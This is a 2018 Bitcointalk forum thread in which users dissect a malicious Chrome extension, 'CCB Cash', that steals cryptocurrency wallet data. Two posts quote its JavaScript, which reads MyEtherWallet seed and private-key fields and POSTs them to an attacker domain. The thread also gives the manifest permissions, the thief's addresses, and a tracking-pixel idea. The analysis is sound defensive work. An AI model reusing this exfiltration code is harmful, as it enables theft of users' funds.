Author

Topic: We need some help to decode a hacker addon (Read 603 times)

hero member
Activity: 1582
Merit: 759
December 23, 2018, 01:50:42 AM
#17
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?

AFAIK, google releases the extensions onto the market without them being 100% verified first. There's just simply way too many extensions being uploaded, they wouldn't be able to manually approve each one.

They employ individuals to respond to reports, and perform spot checks (and I'm sure they have automated systems to catch most things/conventional attacks); but at the end of the day it's primarily up to the user to verify.
full member
Activity: 756
Merit: 112
December 21, 2018, 09:17:52 PM
#16
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?
hero member
Activity: 1582
Merit: 759
December 21, 2018, 08:10:44 PM
#15
Note that no URL has ever been captured for help-tools.org



Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

Domain Name: HELP-TOOLS.ORG
Registry Domain ID: D402200000008508823-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2018-12-06T08:04:10Z
Creation Date: 2018-12-02T06:52:52Z

The domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate.

As expected the specific whois is anonymized:

Registrant Email: [email protected]
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255


Emails sent to [email protected] should reach the malware author though.

Did you include a pixel tracker in that? If they open the email and their email service provider doesn't block it, you'll get their IP address which may be useful to connect/identify the user.

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Quite the contrary, it's actually far easier to build & market a chrome extension (or FF) when compared to system level executable.

Let's face it, any script kiddie can basically build one with junior-level knowledge of Javascript.

If Google isn't checking the source, virtually no plugin/extension is 100% safe. I wouldn't be surprised if non-bitcoin related chrome extensions are built just waiting to pickup on Bitcoin related traffic.
sr. member
Activity: 938
Merit: 452
Check your coin privilege
December 20, 2018, 06:37:11 AM
#14
...

I'm not sure honestly. I know for a fact browser extensions can access the file system purely from my experience with past extensions. I spent about 30 minutes skimming google and their developer docs. If this is wrong on my end please let me know :

  • download any additional malware (add-ons are run within an isolated environment) : Downloading malware means the application needs permission to connect to its server, and needs write permission on the target machine. Examples of extensions with write permission : 3rd party session saving that restore your tabs, and any application that needs to store its state on your computer.
  • search through your file system : This means read permission. An extension that comes to mind is download managers and extensions that communicate with other applications.

So, API examples :

https://developer.chrome.com/apps/fileSystem : File System endpoint. After reading through this it looks like you can access absolute paths on the target machine.
https://developer.chrome.com/apps/storage : Storage endpoint. Note that this is a lot different because you can only access your own directory in AppData.
https://developer.chrome.com/extensions/nativeMessaging : Native messaging. Even though after reading through it, it looke like that it might be only possible for the app to send messages to other apps that they programmed themselves.

But even without mentioning all of these, just purely including complete browser access is a massive security risk. Especially for people who use web wallets. Like bob said the extension can run any arbitrary code on any webpage, access any session-related data, display/modify any forms.. Basically a complete takeover over your browser experience.
legendary
Activity: 1624
Merit: 2481
December 20, 2018, 04:38:45 AM
#13
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users.

It depends on how you define safer.


A web browser extension can:
  • access all sites you visit
  • read / modify each information you enter on any website (e.g. usernames / passwords)
  • steal your cookies (which are a form of authentication)

However, a browser extension can NOT:
  • search through your file system
  • download any additional malware (add-ons are run within an isolated environment)
  • access your system at all
  • do anything non-browser-related
  • compromise your system

Running an executable on your system can do anything the user also is able to do (or even more if a privilege escalation is being abused).
legendary
Activity: 3346
Merit: 3130
December 16, 2018, 04:14:56 PM
#12
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Agree and it's sad, google and firefox should worry a little more for the customers, i know they are big platforms and should be hard for them to review their apps one by one, but c'mon we are almost in 2019 and that job could be done by artificial neural networks. A simple grep to verify if the app is hacking information from the main sites like google, outlook, or some social networks.

Is intolerable the fact that anyone can make this kind of apps and publish them as if there were no law.
hero member
Activity: 784
Merit: 1416
December 16, 2018, 03:03:16 PM
#11
It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?

I don't think they are going to be in any hurry to do that indeed. When you install the extension they are telling you the equivalent of "do it at your own risk". I guess they would act a bit faster just if they would start to lose money  Roll Eyes
member
Activity: 266
Merit: 25
December 16, 2018, 11:17:28 AM
#10
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?
hero member
Activity: 784
Merit: 1416
December 16, 2018, 02:10:52 AM
#9
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..
legendary
Activity: 1051
Merit: 1000
https://r.honeygain.me/XEDDM2B07C
December 14, 2018, 12:07:21 PM
#8
@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.

For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.

Sadly, I too believe this is the case. It will take a massive loss for the news to pick it up and spread the facts to the rest of the chrome users. I'm going to take a look at the source code and see if I can find any connections between the domains, addresses and people. I'll let you all know what I find. If only Google were as vigilant with their browser add-ons as they were with their YouTube platform takedown algorithms, our jobs would be a lot easier.. *sigh*

-MisterCoin
legendary
Activity: 3346
Merit: 3130
December 13, 2018, 08:54:00 AM
#7
Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
if (location.href.indexOf('myetherwallet') > -1) {
     function kurilkaNJSmo() {
         document.onkeyup = function(e) {
             e = e || window.event;
             if (e.keyCode === 13) {
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
             return !1
         }
         document.body.addEventListener("click", function(event) {
             if (event.toElement.className == "btn btn-primary ng-scope") {
                 console.log("go");
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
         })
     }
     setTimeout(kurilkaNJSmo, 2000)
 }


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.


EDIT:
Addresses of the thief:
Code:
         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c

Thanks nuno12345 that's some great information, was the kind of info i was searching for. I leave you some merits.  Cheesy
sr. member
Activity: 938
Merit: 452
Check your coin privilege
December 13, 2018, 06:18:21 AM
#6

Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:


I was just going to say that, it's a 404 on the main page, fresh domain, hacked my ass.

I can't think of any way to prevent this from happening to your typical user. If someone thinks that it's possible for an addon, to monitor other downloaded addons, before they're installed, to check for patterns, then it might be possible to make a quick solution to prevent this in the future.

You should all remember that the perpetrator is constantly promoting his scam here using newbie accounts, and probably reads all of this, so hello scammer, we're trying to stop you Cheesy
copper member
Activity: 182
Merit: 18
Crypto.BI
December 13, 2018, 04:40:05 AM
#5
Note that no URL has ever been captured for help-tools.org



Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

Domain Name: HELP-TOOLS.ORG
Registry Domain ID: D402200000008508823-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2018-12-06T08:04:10Z
Creation Date: 2018-12-02T06:52:52Z

The domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate.

As expected the specific whois is anonymized:

Registrant Email: [email protected]
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255


Emails sent to [email protected] should reach the malware author though.
sr. member
Activity: 276
Merit: 284
December 13, 2018, 04:37:34 AM
#4
I understand.

What if someone makes an extension to block this type of behaviour?

Requests could be blocked to certain urls, cors enforced, etc.

By having an external list, say being grabbed from github it could be updated much quicker than relying on google or registrars to take down extensions/domains
legendary
Activity: 3010
Merit: 3724
Join the world-leading crypto sportsbook NOW!
December 13, 2018, 04:20:26 AM
#3
@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.

For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.
sr. member
Activity: 276
Merit: 284
December 13, 2018, 03:52:22 AM
#2
Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
if (location.href.indexOf('myetherwallet') > -1) {
     function kurilkaNJSmo() {
         document.onkeyup = function(e) {
             e = e || window.event;
             if (e.keyCode === 13) {
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
             return !1
         }
         document.body.addEventListener("click", function(event) {
             if (event.toElement.className == "btn btn-primary ng-scope") {
                 console.log("go");
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
         })
     }
     setTimeout(kurilkaNJSmo, 2000)
 }


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.


EDIT:
Addresses of the thief:
Code:
         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c
legendary
Activity: 3346
Merit: 3130
December 12, 2018, 09:45:03 AM
#1
A lot of users on the forum are getting scammed this way as you can see on the next links:

https://bitcointalksearch.org/topic/amazing-attempt-to-scam-read-laugh-and-report-it-cryptocashbackorg-5083404
https://bitcointalksearch.org/topic/conversation-with-the-hacker-who-stole-funds-from-us-5083139
https://bitcointalksearch.org/topic/new-scam-schema-on-the-forum-5081286


So, the add-on has been taken down and they upload it with another name, now is called CCB Cash.

https://chrome.google.com/webstore/detail/%D1%81cb-cash/liachincjagnalnmahhaioaogkngbmhf?hl=en-US&gl=MX

So, there is an extension to view source code from any addon, it's called 'Chrome extension source viewer'

When i take a look to this code i realized how bad it is...

Code:
    "name": "CCB Cash",
    "permissions": [
        "activeTab",
        "tabs",
        "cookies",
        "*://github.com/*",
        "*://api.github.com/*",
        "*://exmo.me/*",
        "*://*.twitter.com/*",
        "*://*.coinbase.com/*",
        "*://qq.com/*",
        "*://*.hbg.com/*",
        "*://hitbtc.com/*",
        "*://twitter.com/*",
        "*://*.binance.com/*",
        "*://*.localbitcoins.com/*",
        "*://localbitcoins.com/*",
        "*://blockchain.com/*",
        "*://*.exmo.com/*",
        "*://cryptodraw.org/*",
        "*://exmo.com/*",
        "*://*.live.com/*",
        "*://bitfinex.com/*",
        "*://hbg.com/*",
        "*://*.yahoo.com/*",
        "*://google.com/*",
        "*://*.bitfinex.com/*",
        "*://*.hitbtc.com/*",
        "*://coinbase.com/*",
        "*://*.huobi.com/*",
        "*://*.google.com/*",
        "*://*.exmo.me/*",
        "*://huobi.com/*",
        "*://yahoo.com/*",
        "*://*.blockchain.com/*",
        "*://myetherwallet.com/*",
        "*://binance.com/*",
        "*://*.myetherwallet.com/*",
        "*://live.com/*",
        "*://*.qq.com/*"
    ],

So, this time i ask for some help, maybe the developers can find some useful information about this APP to stop this hacker.

By the way, you don't have to install the addon to see the source.
Jump to: